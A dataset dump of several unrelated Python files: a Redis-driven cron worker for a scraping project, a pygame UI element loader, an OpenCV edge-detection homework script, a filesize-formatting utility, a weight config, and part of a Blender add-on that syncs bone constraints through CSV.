os.path.exists(os.path.join(settings.BASE_DIR, 'run', pidfile)):\n with open(os.path.join(settings.BASE_DIR, 'run', pidfile), 'r') as f:\n pid = int(f.read())\n try:\n p = psutil.Process(pid)\n exit(0)\n except Exception as e:\n print(e)\n with open(os.path.join(settings.BASE_DIR, 'run', pidfile), 'w') as f:\n f.write(str(os.getpid()))\n\nfrom grab.checkuser import checkproduct,checkproductdiary,checkdiary,checkdiaryreply,checkhospital,checkdoctor,checkuser,checkdoctordiary,checkdoctorxiangmu\n\ndef task_checkdiary():\n con = get_redis_connection('default')\n beforecheck('task_checkdiary')\n while 1:\n arr=con.zrange('diary_list',0,3)\n ath=[threading.Thread(target=checkdiary,args=(did.decode(),)) for did in arr]\n [th.start() for th in ath]\n [th.join() for th in ath]\n # for did in arr:\n # checkdiary(did.decode())\n #time.sleep(0.01)\n con.zrem('diary_list', *arr)\n print('aftersleep')\n\n\ndef task_checkuser():\n con = get_redis_connection('default')\n beforecheck(sys._getframe().f_code.co_name)\n while 1:\n arr=con.zrange('user_list',0,3)\n print('arrL',arr)\n ath=[threading.Thread(target=checkuser,args=(did.decode(),)) for did in arr]\n [th.start() for th in ath]\n [th.join() for th in ath]\n # for did in arr:\n # tmp=checkuser(did.decode())\n #time.sleep(0.01)\n con.zrem('user_list',*arr)\n print('aftersleep')\n\ndef task_checkproduct():\n con = get_redis_connection('default')\n beforecheck(sys._getframe().f_code.co_name)\n while 1:\n arr=con.zrange('product_list',0,3)\n ath=[threading.Thread(target=checkproduct,args=(did.decode(),)) for did in arr]\n [th.start() for th in ath]\n [th.join() for th in ath]\n # for did in arr:\n # tmp=checkproduct(did.decode())\n #time.sleep(0.01)\n con.zrem('product_list', *arr)\n print('aftersleep')\n\ndef task_checkhospital():\n con = get_redis_connection('default')\n beforecheck(sys._getframe().f_code.co_name)\n while 1:\n arr=con.zrange('hospital_list',0,3)\n ath=[threading.Thread(target=checkhospital,args=(did.decode(),)) for did in arr]\n [th.start() for th in ath]\n [th.join() for th in ath]\n # for did in arr:\n # checkhospital(did.decode())\n #time.sleep(0.01)\n con.zrem('hospital_list', *arr)\n print('aftersleep')\nfrom grab.checkuser import checkuserflow,checkuserfans\ndef task_checkdoctor():\n con = get_redis_connection('default')\n beforecheck(sys._getframe().f_code.co_name)\n while 1:\n arr=con.zrange('doctor_list',0,3)\n ath=[threading.Thread(target=checkdoctor,args=(did.decode(),)) for did in arr]\n [th.start() for th in ath]\n [th.join() for th in ath]\n # for did in arr:\n # checkdoctor(did.decode())\n #time.sleep(0.01)\n con.zrem('doctor_list', *arr)\n print('aftersleep')\n\n\n#164361819\nif __name__=='__main__':\n task_checkuser()","repo_name":"fengchuan1021/soyoung","sub_path":"grab/cron_task.py","file_name":"cron_task.py","file_ext":"py","file_size_in_byte":3843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"18021755369","text":"# ui_dict = {\n# textobj_list = []\n# tile_list = [\n# tile = {\n# animations = {\n# state_default =\n# state_mdown =\n# }\n# trigger_id =\n# mirrored =\n# flipped\n# width =\n# height =\n# positions = [\n# [x, y]\n# [x, y]\n# ...\n# ]\n# }\n# ...\n# ]\n#\n# trigger_map = [\n# trigger_id = {\n# trigger_id =\n# top = [x, y]\n# left = [x, y]\n# bottom = [x, y]\n# right = [x, y]\n# state =\n# key_code =\n# }\n# ]\n# sound_set = {\n# sound = {\n# sound_name\n# trigger_id = {\n# states = []\n# }\n# }\n# }\n# }\n\nimport pygame\nfrom class_UIText import UIText\n\n\nclass UIElement:\n\n def __init__(self, gameboard, ui_name):\n # Initialize attributes to represent the character.\n\n self.gameboard = gameboard\n self.image = None\n self.screen = self.gameboard.screen\n\n self.mousefollow = 0\n self.stick_hor = -1\n self.stick_ver = -1\n self.offset_x = 0\n self.offset_y = 0\n\n self.textlayer_list = []\n self.uielement = self.load_uielement(ui_name)\n self.active = True\n self.x = 0\n self.y = 0\n\n def load_uielement(self, ui_name):\n textobj_list = []\n dyn_textobj_dict = {}\n trigger_map = {}\n tile_list = []\n tr_tile_dict = {}\n sound_list = {}\n\n uielement_list = self.gameboard.resources.read_file(self.gameboard.resources.uielements[ui_name])\n\n u = 0\n while u < len(uielement_list):\n if len(uielement_list[u]) > 0 and uielement_list[u][0] != '#':\n element_name, element_content = uielement_list[u].split(\"=\")\n if element_name == 'alignment':\n content_list = element_content.split()\n self.mousefollow, self.stick_hor, self.stick_ver, self.offset_x, self.offset_y = float(\n content_list[0]), float(content_list[1]), float(content_list[2]), float(content_list[3]), float(\n content_list[4])\n if element_name == 'ui_topleft':\n ui_x, ui_y = element_content.split(',')\n self.x, self.y = int(ui_x), int(ui_y)\n if element_name == 'text':\n new_text = self.create_text(element_content)\n textobj_list.append(new_text)\n elif element_name == 'dyn_text':\n new_text = self.create_dyn_text(element_content)\n dyn_textobj_dict[new_text.text_id] = new_text\n elif element_name == 'trigger':\n trigger_id, new_trigger = self.create_trigger(element_content)\n trigger_map[trigger_id] = new_trigger\n elif element_name == 'tr_tile':\n content_list = element_content.split()\n if len(content_list) == 6:\n anim_number = int(content_list[-1])\n anim_rows = uielement_list[u + 2:u + 2 + anim_number]\n position_list = uielement_list[u + 1].split()\n new_tr_tile = self.create_tr_tile(content_list[:5], position_list, anim_rows)\n tr_tile_dict[new_tr_tile['trigger_id']] = new_tr_tile\n u += (2 + anim_number)\n elif element_name == 'tile':\n content_list = element_content.split()\n if len(content_list) == 4:\n position_list = uielement_list[u + 1].split()\n new_tile = self.create_tile(content_list[:4], position_list, uielement_list[u + 2])\n tile_list.append(new_tile)\n u += 2\n elif element_name == 'sound':\n element_list = element_content.split()\n sound_list[element_list[0]] = element_list[1]\n u += 1\n uielement_dict = {\n 'textobj_list': textobj_list,\n 'dyn_textobj_dict': dyn_textobj_dict,\n 'trigger_map': trigger_map,\n 'tr_tile_dict': tr_tile_dict,\n 'tile_list': tile_list,\n 'sound_list': sound_list\n }\n return uielement_dict\n\n def create_text(self, text_content):\n if len(text_content) < 12:\n return False\n x, y, font, size, color, bg_color, h_align, v_align, max_width, max_height, timer, mov_x, mov_y, caption = text_content.split()\n x = float(x)\n y = float(y)\n font = font\n size = float(size)\n r, g, b = color.split(',')\n color = (int(r), int(g), int(b))\n r, g, b = bg_color.split(',')\n bg_color = (int(r), int(g), int(b))\n h_align = h_align\n v_align = v_align\n max_width = float(max_width)\n max_height = float(max_height)\n timer = int(timer)\n mov_x = int(mov_x)\n mov_y = int(mov_y)\n new_text = UIText(self.gameboard, 'no_id', caption, x, y, font, size, color, bg_color, h_align, v_align, max_width, max_height, timer, mov_x, mov_y)\n return new_text\n\n def create_dyn_text(self, text_content):\n if len(text_content) < 12:\n return False\n text_id, x, y, font, size, color, bg_color, h_align, v_align, max_width, max_height, timer, mov_x, mov_y = text_content.split()\n x = float(x)\n y = float(y)\n font = font\n size = float(size)\n r, g, b = color.split(',')\n color = (int(r), int(g), int(b))\n r, g, b = bg_color.split(',')\n bg_color = (int(r), int(g), int(b))\n h_align = h_align\n v_align = v_align\n max_width = float(max_width)\n max_height = float(max_height)\n timer = int(timer)\n mov_x = int(mov_x)\n mov_y = int(mov_y)\n new_text = UIText(self.gameboard, text_id, '', x, y, font, size, color, bg_color, h_align, v_align, max_width, max_height, timer, mov_x, mov_y)\n return new_text\n\n def create_trigger(self, trigger_content):\n trigger_id, rect, key_code = trigger_content.split()\n if len(trigger_content) < 3:\n return False\n top, left, bottom, right = rect.split(',')\n trigger_dict = {\n # 'trigger_id': trigger_id,\n 'top': float(top),\n 'left': float(left),\n 'bottom': float(bottom),\n 'right': float(right),\n 'state': 'default',\n 'key_code': int(key_code)\n }\n return trigger_id, trigger_dict\n\n def create_tr_tile(self, content_list, position_list, anim_rows):\n trigger_id, mirrored, flipped, width, height = content_list\n tile_dict = {\n 'trigger_id': trigger_id,\n 'mirrored': int(mirrored),\n 'flipped': int(flipped),\n 'width': float(width),\n 'height': float(height),\n 'positions': [],\n 'animations': {}\n }\n for position in position_list:\n pos_xy = position.split(',')\n print(pos_xy)\n pos_x = float(pos_xy[0])\n pos_y = float(pos_xy[1])\n tile_dict['positions'].append([pos_x, pos_y])\n for anim_row in anim_rows:\n state, anim = anim_row.split('=')\n tile_dict['animations'][state] = self.gameboard.resources.animations[anim]\n return tile_dict\n\n def create_tile(self, content_list, position_list, anim_row):\n mirrored, flipped, width, height = content_list\n tile_dict = {\n 'mirrored': int(mirrored),\n 'flipped': int(flipped),\n 'width': float(width),\n 'height': float(height),\n 'positions': [],\n 'animation': self.gameboard.resources.animations[anim_row]\n }\n for position in position_list:\n pos_xy = position.split(',')\n print(pos_xy)\n pos_x = float(pos_xy[0])\n pos_y = float(pos_xy[1])\n tile_dict['positions'].append([pos_x, pos_y])\n return tile_dict\n\n def blitme(self):\n if self.mousefollow:\n self.x, self.y = self.gameboard.mouse_x + self.offset_x * self.gameboard.square_width, self.gameboard.mouse_y + self.offset_y * self.gameboard.square_height\n else:\n if self.stick_hor != -1:\n self.x = self.gameboard.sight_width * self.stick_hor + self.offset_x * self.gameboard.square_width\n if self.stick_ver != -1:\n self.y = self.gameboard.sight_height * self.stick_ver + self.offset_y * self.gameboard.square_height\n\n # static tiles\n for tile in self.uielement['tile_list']:\n animation = tile['animation']\n image = animation.frames[animation.frame_index]\n mirrored, flipped = False, False\n if 'mirrored' in tile:\n mirrored = tile['mirrored'] # horisontal\n if 'flipped' in tile:\n flipped = tile['flipped'] # vertical\n image = pygame.transform.flip(image, mirrored, flipped)\n rect = image.get_rect()\n for x, y in tile['positions']:\n rect.topleft = round(x * self.gameboard.square_width + self.x), round(y * self.gameboard.square_height + self.y)\n # print(rect.topleft, self.gameboard.player_char.x, self.gameboard.player_char.y)\n self.screen.blit(pygame.transform.scale(image, (\n round(tile['width'] * self.gameboard.square_width),\n round(tile['height'] * self.gameboard.square_height))), rect)\n\n # trigger tiles\n for tr_id, tr_tile in self.uielement['tr_tile_dict'].items():\n anim_state = self.uielement['trigger_map'][tr_id]['state']\n if anim_state not in tr_tile['animations']:\n anim_state = 'default'\n animation = tr_tile['animations'][anim_state]\n animation.checkme()\n image = animation.frames[animation.frame_index]\n\n mirrored, flipped = False, False\n if 'mirrored' in tr_tile:\n mirrored = tr_tile['mirrored'] # horisontal\n if 'flipped' in tr_tile:\n flipped = tr_tile['flipped'] # vertical\n image = pygame.transform.flip(image, mirrored, flipped)\n rect = image.get_rect()\n\n for x, y in tr_tile['positions']:\n rect.topleft = round(x * self.gameboard.square_width + self.x), round(y * self.gameboard.square_height + self.y)\n # print(rect.topleft, self.gameboard.player_char.x, self.gameboard.player_char.y)\n self.screen.blit(pygame.transform.scale(image, (\n round(tr_tile['width'] * self.gameboard.square_width),\n round(tr_tile['height'] * self.gameboard.square_height))), rect)\n\n for text in self.uielement['textobj_list']:\n if text.visible:\n text.blitme(self.x, self.y)\n for text in self.uielement['dyn_textobj_dict'].values():\n if text.visible:\n text.blitme(self.x, self.y)\n","repo_name":"Sprottenfraulein/IHHAB","sub_path":"class_UIElement.py","file_name":"class_UIElement.py","file_ext":"py","file_size_in_byte":11474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"12959595071","text":"import numpy as np\nimport cv2\n\n\ndef get_histograms():\n histograms = np.empty(512)\n bins = np.array(range(512))\n inds = np.digitize((np.array(range(581)) * 0.882), bins) - 1\n for filename in os.listdir('../images/ST2MainHall4'):\n print(filename)\n img = cv2.imread('./images/ST2MainHall4/' + filename, 1).astype(int)\n # apply formula [(r/32) ∗ 64 + (g/32) ∗ 8 + b/32]. Max index is 580\n indices = ((img[:, :, 2] << 1) + (img[:, :, 1] >> 2) + (img[:, :, 0] >> 5)).ravel()\n histogram = np.zeros(512)\n counts = np.bincount(indices)\n # map indices from 0 to 580 into the 512 bins\n for i in range(np.shape(counts)[0]):\n histogram[inds[i]] += counts[i]\n histograms = np.vstack([histograms, histogram])\n return histograms[1:]\n\n\ngray_img = cv2.imread('../images/ST2MainHall4/ST2MainHall4001.jpg', 0)\nimg = cv2.imread('../images/ST2MainHall4/ST2MainHall4001.jpg', 1)\nblues = img[:, :, 0]\ngreens = img[:, :, 1]\nreds = img[:, :, 2]\ngray_edges = cv2.Canny(gray_img, 100, 200) == 0\nblue_edges = cv2.Canny(blues, 100, 200) == 0\nred_edges = cv2.Canny(reds, 100, 200) == 0\ngreen_edges = cv2.Canny(greens, 100, 200) == 0\nsobelX_gray = cv2.Sobel(gray_img,cv2.CV_64F,1,0,ksize=5)\nsobelY_gray = cv2.Sobel(gray_img,cv2.CV_64F,0,1,ksize=5)\nsobelX_blue = cv2.Sobel(blues,cv2.CV_64F,1,0,ksize=5)\nsobelY_blue = cv2.Sobel(blues,cv2.CV_64F,0,1,ksize=5)\nsobelX_red = cv2.Sobel(reds,cv2.CV_64F,1,0,ksize=5)\nsobelY_red = cv2.Sobel(reds,cv2.CV_64F,0,1,ksize=5)\nsobelX_green = cv2.Sobel(greens,cv2.CV_64F,1,0,ksize=5)\nsobelY_green = cv2.Sobel(greens,cv2.CV_64F,0,1,ksize=5)\nsobelX_gray[gray_edges] = 0\nsobelY_gray[gray_edges] = 0\nsobelX_blue[blue_edges] = 0\nsobelY_blue[blue_edges] = 0\nsobelX_red[red_edges] = 0\nsobelY_red[red_edges] = 0\nsobelX_green[green_edges] = 0\nsobelY_green[green_edges] = 0\ncv2.imshow('img', sobelX_gray)\ncv2.imshow('edges', sobelX_gray)\ncv2.waitKey(0)\ncv2.destroyAllWindows()","repo_name":"jchoi34/CS682","sub_path":"jchoi34_hw3.py","file_name":"jchoi34_hw3.py","file_ext":"py","file_size_in_byte":1959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"12680687804","text":"# coding: utf-8\n\"\"\"Functions for reporting filesizes. Borrowed from https://github.com/PyFilesystem/pyfilesystem2\n\nThe functions declared in this module should cover the different\nuse cases needed to generate a string representation of a file size\nusing several different units. Since there are many standards regarding\nfile size units, three different functions have been implemented.\n\nSee Also:\n * `Wikipedia: Binary prefix `_\n\n\"\"\"\n\n__all__ = [\"decimal\"]\n\nfrom typing import Iterable, List, Optional, Tuple\n\n\ndef _to_str(\n size: int,\n suffixes: Iterable[str],\n base: int,\n *,\n precision: Optional[int] = 1,\n separator: Optional[str] = \" \",\n) -> str:\n if size == 1:\n return \"1 byte\"\n elif size < base:\n return \"{:,} bytes\".format(size)\n\n for i, suffix in enumerate(suffixes, 2): # noqa: B007\n unit = base**i\n if size < unit:\n break\n return \"{:,.{precision}f}{separator}{}\".format(\n (base * size / unit),\n suffix,\n precision=precision,\n separator=separator,\n )\n\n\ndef pick_unit_and_suffix(size: int, suffixes: List[str], base: int) -> Tuple[int, str]:\n \"\"\"Pick a suffix and base for the given size.\"\"\"\n for i, suffix in enumerate(suffixes):\n unit = base**i\n if size < unit * base:\n break\n return unit, suffix\n\n\ndef decimal(\n size: int,\n *,\n precision: Optional[int] = 1,\n separator: Optional[str] = \" \",\n) -> str:\n \"\"\"Convert a filesize in to a string (powers of 1000, SI prefixes).\n\n In this convention, ``1000 B = 1 kB``.\n\n This is typically the format used to advertise the storage\n capacity of USB flash drives and the like (*256 MB* meaning\n actually a storage capacity of more than *256 000 000 B*),\n or used by **Mac OS X** since v10.6 to report file sizes.\n\n Arguments:\n int (size): A file size.\n int (precision): The number of decimal places to include (default = 1).\n str (separator): The string to separate the value from the units (default = \" \").\n\n Returns:\n `str`: A string containing a abbreviated file size and units.\n\n Example:\n >>> filesize.decimal(30000)\n '30.0 kB'\n >>> filesize.decimal(30000, precision=2, separator=\"\")\n '30.00kB'\n\n \"\"\"\n return _to_str(\n size,\n (\"kB\", \"MB\", \"GB\", \"TB\", \"PB\", \"EB\", \"ZB\", \"YB\"),\n 1000,\n precision=precision,\n separator=separator,\n )\n","repo_name":"Textualize/rich","sub_path":"rich/filesize.py","file_name":"filesize.py","file_ext":"py","file_size_in_byte":2508,"program_lang":"python","lang":"en","doc_type":"code","stars":45508,"dataset":"github-code","pt":"39"} +{"seq_id":"2711996967","text":"# -*- coding: UTF-8 -*-\n#activeness weight dict used by evaluate_index.py\nactiveness_weight_dict = {'activity_time':0.3, 'activity_geo':0.2, 'statusnum':0.5}\n#importance weight dict\nimportance_weight_dict = {'fansnum':0.3, 'retweeted_num':0.3, 'domain':0.2, 'topic':0.2}\n#topic weight dict\ntopic_weight_dict = {'政治':0.3, '军事':0.15, '社会':0.15, '环境':0.05, \\\n '医药':0.05, '经济':0.05, '交通':0.05, '教育':0.05, \\\n '计算机':0.05, '艺术':0.05, '体育':0.05}\n#domain weight dict\ndomain_weight_dict = {'文化':0.3, '媒体':0.3, '财经':0.1, '教育':0.1, \\\n '科技':0.05, '娱乐':0.05, '时尚':0.05, '体育':0.05}\n","repo_name":"lcwy220/sensitive_user_portrait","sub_path":"sensitive_user_portrait/cron/attribute/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"17917421181","text":"#!BPY\n# -*- coding: UTF-8 -*-\n# sync_bone_constraints\n#\n# Sync Armature's bone's constraints\n# And Sync bone's Inverse Kinematics Settings\n# 2018.06.06 N(Natukikazemizo)\n\nif \"bpy\" in locals():\n import imp\n imp.reload(utils_io_csv)\n imp.reload(bone_constraints)\n imp.reload(common)\nelse:\n from . import utils_io_csv\n from . import bone_constraints\n from . import common\n\nimport bpy\nimport re\n\nclass StringValGroup(bpy.types.PropertyGroup):\n string_val = bpy.props.StringProperty()\n\nbpy.utils.register_class(StringValGroup)\n\nclass MySettings(bpy.types.PropertyGroup):\n\n# emotion = bpy.props.EnumProperty(\n# name = \"Emotion\",\n# description = \"Select emotion of registration destination.\",\n# items = common.emotions\n# )\n\n# overwrite_data = bpy.props.BoolProperty(\n# name = \"Overwrite Data\",\n# description = \"Enable or disable overwriting of data.\",\n# default = True\n# )\n\n csv_file_name = bpy.props.StringProperty(\n name = \"csv_file_name\",\n description = \"CSV file name.\"\n )\n csv_file_directory = bpy.props.StringProperty(subtype=\"FILE_PATH\")\n\n msg_chk = bpy.props.StringProperty()\n msg_icon = bpy.props.StringProperty()\n\n\n msg_x_miller_chk = bpy.props.StringProperty()\n #msg_x_miller_icon = bpy.props.StringProperty()\n\n # リストで選択されているオブジェクトの名前\n #sel_armaturej= bpy.props.StringProperty()\n\n # 選択されている値が格納されるプロパティ\n sel_armature = bpy.props.StringProperty()\n sel_string_val = bpy.props.StringProperty()\n\n # Drop Downリストに表示される値のリスト\n string_val_list = bpy.props.CollectionProperty(type=bpy.types.StringValGroup)\n\n direction = bpy.props.EnumProperty(\n name = \"Direction\",\n description = \"Select constraints copy dilection.\",\n items = common.directions\n )\n\n def init_val_list(self):\n self.string_val_list.clear()\n for obj in bpy.data.objects:\n if obj.type == 'ARMATURE':\n v = self.string_val_list.add()\n v.string_val = obj.name\n v.name = obj.name\n\n def check(self):\n if self.csv_file_name == \"\":\n self.msg_chk = bpy.app.translations.pgettext(\"Select CSV file.\")\n self.msg_icon = \"ERROR\"\n elif self.sel_armature == \"\":\n self.msg_chk = bpy.app.translations.\\\n pgettext(\"Select target Armature.\")\n self.msg_icon = \"ERROR\"\n else:\n self.msg_chk = \"OK\"\n self.msg_icon = \"INFO\"\n\n\n\n # def check_x_miller(self):\n # self.msg_x_miller_chk = \"OK\"\n # self.msg_x_miller_icon = \"INFO\"\n\n# def update_val(self, nm):\n# for sv in self.string_val_list:\n# if sv.name == nm:\n# self.sel_string_val = sv.string_val\n\nclass SelectCSVFile(bpy.types.Operator):\n\n bl_idname = \"object.select_csv_file\"\n bl_label = bpy.app.translations.pgettext(\"Select CSV File\")\n bl_description = bpy.app.translations.pgettext(\"Select CSV File\")\n bl_options = {'REGISTER', 'UNDO'}\n\n filepath = bpy.props.StringProperty(subtype=\"FILE_PATH\")\n filename = bpy.props.StringProperty(name=\"filename\")\n directory = bpy.props.StringProperty(subtype=\"FILE_PATH\")\n # Search Filter\n filter_glob = bpy.props.StringProperty(\n default=\"*.csv\",\n options={'HIDDEN'}\n )\n\n def execute(self, context):\n self.report(\n {'INFO'},\n \" [FilePath] %s, [FileName] %s, [Directory] %s\"\n % (self.filepath, self.filename, self.directory)\n )\n props = context.window_manager.sync_bone_constraints_props\n props.csv_file_directory = self.directory\n props.csv_file_name = self.filename\n return {'FINISHED'}\n\n def invoke(self, context, event):\n wm = context.window_manager\n # Show File Browser\n wm.fileselect_add(self)\n\n return {'RUNNING_MODAL'}\n\nclass NullOperation(bpy.types.Operator):\n\n bl_idname = \"object.null_operation\"\n bl_label = \"NOP\"\n bl_description = \"何もしない\"\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n return {'FINISHED'}\n\n#class NullOperationMenu(bpy.types.Menu):\n#\n# bl_idname = \"object.null_operation_menu\"\n# bl_label = \"NOP Menu\"\n# bl_description = \"Menu with multiple processes that do nothing\"\n\n# def draw(self, context):\n# layout = self.layout\n# # メニュー項目の追加\n# for i in range(3):\n# layout.operator(NullOperation.bl_idname, text=(\"項目 %d\" % (i)))\n\nclass SyncBonesIK(bpy.types.Operator):\n\n bl_idname = \"object.sync_bones_ik\"\n bl_label = \"SyncBonesIK\"\n bl_description = \"Sync bones Invese Kinematics Settings.\"\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n props = context.window_manager.sync_bone_constraints_props\n\n fromArmature = bpy.context.object.name\n for x in bpy.data.objects[props.sel_armature].pose.bones:\n if x.name in bpy.data.objects[fromArmature].pose.bones:\n fromBone = bpy.data.objects[fromArmature].pose.bones[x.name]\n x.ik_min_x = fromBone.ik_min_x\n x.ik_min_y = fromBone.ik_min_y\n x.ik_min_z = fromBone.ik_min_z\n x.ik_max_x = fromBone.ik_max_x\n x.ik_max_y = fromBone.ik_max_y\n x.ik_max_z = fromBone.ik_max_z\n x.use_ik_limit_x = fromBone.use_ik_limit_x\n x.use_ik_limit_y = fromBone.use_ik_limit_y\n x.use_ik_limit_z = fromBone.use_ik_limit_z\n x.ik_stretch = fromBone.ik_stretch\n x.lock_ik_x = fromBone.lock_ik_x\n x.lock_ik_y = fromBone.lock_ik_y\n x.lock_ik_z = fromBone.lock_ik_z\n\n return {'FINISHED'}\n\n\n# Sync Bone Constraints\nclass SyncBoneConstraints(bpy.types.Operator):\n\n bl_idname = \"object.sync_bone_constraints\"\n bl_label = \"Sync\"\n bl_description = \"Sync bones constraints of Armatures.\"\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n ExportBoneConstraints.execute(ExportBoneConstraints, context)\n ImportBoneConstraints.execute(ImportBoneConstraints, context)\n SyncBonesIK.execute(SyncBonesIK, context)\n return {'FINISHED'}\n\nclass ExportBoneConstraints(bpy.types.Operator):\n\n bl_idname = \"object.export_bone_constraints\"\n bl_label = \"Export\"\n bl_description = \"Export bones constraints to CSV File.\"\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n bone_data = []\n bone_data.append(bone_constraints.BoneConstraints.header)\n\n for x in bpy.context.selected_pose_bones:\n # SKIP Special Bone\n if x.name == \"Controllers_Root\":\n continue\n\n if len(x.constraints) == 0:\n data = bone_constraints.BoneConstraints()\n data.bone_name = x.name\n bone_data.append(data.row)\n\n for y in x.constraints:\n data = bone_constraints.BoneConstraints()\n if y.type == \"TRANSFORM\":\n print(x.name + \", \" + y.name)\n\n data.bone_name = x.name\n data.constraint_name = y.name\n data.mute = y.mute\n data.target = y.target.name\n data.subtarget_bone_name = y.subtarget\n data.extrapolate = y.use_motion_extrapolate\n data.from_min_x = y.from_min_x\n data.from_max_x = y.from_max_x\n data.from_min_y = y.from_min_y\n data.from_max_y = y.from_max_y\n data.from_min_z = y.from_min_z\n data.from_max_z = y.from_max_z\n data.map_to_x_from = y.map_to_x_from\n data.map_to_y_from = y.map_to_y_from\n data.map_to_z_from = y.map_to_z_from\n data.map_to = y.map_to\n\n if y.map_to == \"LOCATION\":\n data.to_min_x = y.to_min_x\n data.to_max_x = y.to_max_x\n data.to_min_y = y.to_min_y\n data.to_max_y = y.to_max_y\n data.to_min_z = y.to_min_z\n data.to_max_z = y.to_max_z\n elif y.map_to == \"ROTATION\":\n data.to_min_x = y.to_min_x_rot\n data.to_max_x = y.to_max_x_rot\n data.to_min_y = y.to_min_y_rot\n data.to_max_y = y.to_max_y_rot\n data.to_min_z = y.to_min_z_rot\n data.to_max_z = y.to_max_z_rot\n else:\n # map_to:SCALE\n data.to_min_x = y.to_min_x_scale\n data.to_max_x = y.to_max_x_scale\n data.to_min_y = y.to_min_y_scale\n data.to_max_y = y.to_max_y_scale\n data.to_min_z = y.to_min_z_scale\n data.to_max_z = y.to_max_z_scale\n\n data.target_space = y.target_space\n data.owner_space = y.owner_space\n data.influence = y.influence\n data.type = y.type\n\n bone_data.append(data.row)\n elif y.type == \"COPY_LOCATION\":\n print(x.name + \", \" + y.name)\n\n data.bone_name = x.name\n data.constraint_name = y.name\n data.mute = y.mute\n data.target = y.target.name\n data.subtarget_bone_name = y.subtarget\n\n data.from_min_x = y.use_x\n data.from_max_x = y.invert_x\n data.from_min_y = y.use_y\n data.from_max_y = y.invert_y\n data.from_min_z = y.use_z\n data.from_max_z = y.invert_z\n\n data.target_space = y.target_space\n data.owner_space = y.owner_space\n data.influence = y.influence\n data.type = y.type\n data.head_tail = y.head_tail\n data.use_offset = y.use_offset\n\n bone_data.append(data.row)\n\n elif y.type == \"COPY_ROTATION\":\n print(x.name + \", \" + y.name)\n\n data.bone_name = x.name\n data.constraint_name = y.name\n data.mute = y.mute\n data.target = y.target.name\n data.subtarget_bone_name = y.subtarget\n\n data.from_min_x = y.use_x\n data.from_max_x = y.invert_x\n data.from_min_y = y.use_y\n data.from_max_y = y.invert_y\n data.from_min_z = y.use_z\n data.from_max_z = y.invert_z\n\n data.target_space = y.target_space\n data.owner_space = y.owner_space\n data.influence = y.influence\n data.type = y.type\n data.use_offset = y.use_offset\n\n bone_data.append(data.row)\n\n elif y.type == \"IK\":\n print(x.name + \", \" + y.name)\n\n data.bone_name = x.name\n data.constraint_name = y.name\n data.mute = y.mute\n data.target = y.target.name\n data.subtarget_bone_name = y.subtarget\n\n data.influence = y.influence\n data.type = y.type\n\n data.pole_target = y.pole_target\n data.pole_subtarget = y.pole_subtarget\n data.pole_angle = y.pole_angle\n data.iterations = y.iterations\n data.chain_count = y.chain_count\n data.use_tail = y.use_tail\n data.use_stretch = y.use_stretch\n data.use_location = y.use_location\n data.weight = y.weight\n data.use_rotation = y.use_rotation\n data.orient_weight = y.orient_weight\n\n bone_data.append(data.row)\n\n\n props = context.window_manager.sync_bone_constraints_props\n utils_io_csv.write(props.csv_file_directory,\n props.csv_file_name,\n bone_data)\n return {'FINISHED'}\n\nclass ImportBoneConstraints(bpy.types.Operator):\n\n bl_idname = \"object.import_bone_constraints\"\n bl_label = \"Import\"\n bl_description = \"Import bones constraints from CSV file.\"\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n props = context.window_manager.sync_bone_constraints_props\n target = props.sel_armature\n props = context.window_manager.sync_bone_constraints_props\n header, data = utils_io_csv.read(props.csv_file_directory, \\\n props.csv_file_name)\n\n for row in data:\n if bpy.data.objects.find(target) == -1:\n print(\"Object not found. Object name is \" + target)\n break\n\n con = bone_constraints.BoneConstraints(row)\n\n if bpy.data.objects[target].pose.bones.find(con.bone_name) == -1:\n print(\"Bone not found. Bone name is \" + con.bone_name)\n break\n bone = bpy.data.objects[target].pose.bones[con.bone_name]\n for x in bone.constraints:\n bone.constraints.remove(x)\n\n for row in data:\n\n con = bone_constraints.BoneConstraints(row)\n\n bone = bpy.data.objects[target].pose.bones[con.bone_name]\n\n if con.constraint_name is None or con.constraint_name == \"\":\n continue\n\n if bone.constraints.find(con.constraint_name) == -1:\n constraint = bone.constraints.new(type=con.type)\n constraint.name = con.constraint_name\n\n constraint = bone.constraints[con.constraint_name]\n\n print(\"bone:\" + bone.name + \" constraint:\" + constraint.name)\n\n constraint.mute = con.mute == \"True\"\n constraint.target = bpy.data.objects[target]\n constraint.subtarget = con.subtarget_bone_name\n\n if con.type == \"TRANSFORM\":\n constraint.use_motion_extrapolate = con.extrapolate == \"True\"\n\n constraint.from_min_x = float(con.from_min_x)\n constraint.from_max_x = float(con.from_max_x)\n constraint.from_min_y = float(con.from_min_y)\n constraint.from_max_y = float(con.from_max_y)\n constraint.from_min_z = float(con.from_min_z)\n constraint.from_max_z = float(con.from_max_z)\n\n constraint.map_to_x_from = con.map_to_x_from\n constraint.map_to_y_from = con.map_to_y_from\n constraint.map_to_z_from = con.map_to_z_from\n constraint.map_to = con.map_to\n if constraint.map_to == \"LOCATION\":\n constraint.to_min_x = float(con.to_min_x)\n constraint.to_max_x = float(con.to_max_x)\n constraint.to_min_y = float(con.to_min_y)\n constraint.to_max_y = float(con.to_max_y)\n constraint.to_min_z = float(con.to_min_z)\n constraint.to_max_z = float(con.to_max_z)\n elif constraint.map_to == \"ROTATION\":\n constraint.to_min_x_rot = float(con.to_min_x)\n constraint.to_max_x_rot = float(con.to_max_x)\n constraint.to_min_y_rot = float(con.to_min_y)\n constraint.to_max_y_rot = float(con.to_max_y)\n constraint.to_min_z_rot = float(con.to_min_z)\n constraint.to_max_z_rot = float(con.to_max_z)\n else:\n # map_to:SCALE\n constraint.to_min_x_scale = float(con.to_min_x)\n constraint.to_max_x_scale = float(con.to_max_x)\n constraint.to_min_y_scale = float(con.to_min_y)\n constraint.to_max_y_scale = float(con.to_max_y)\n constraint.to_min_z_scale = float(con.to_min_z)\n 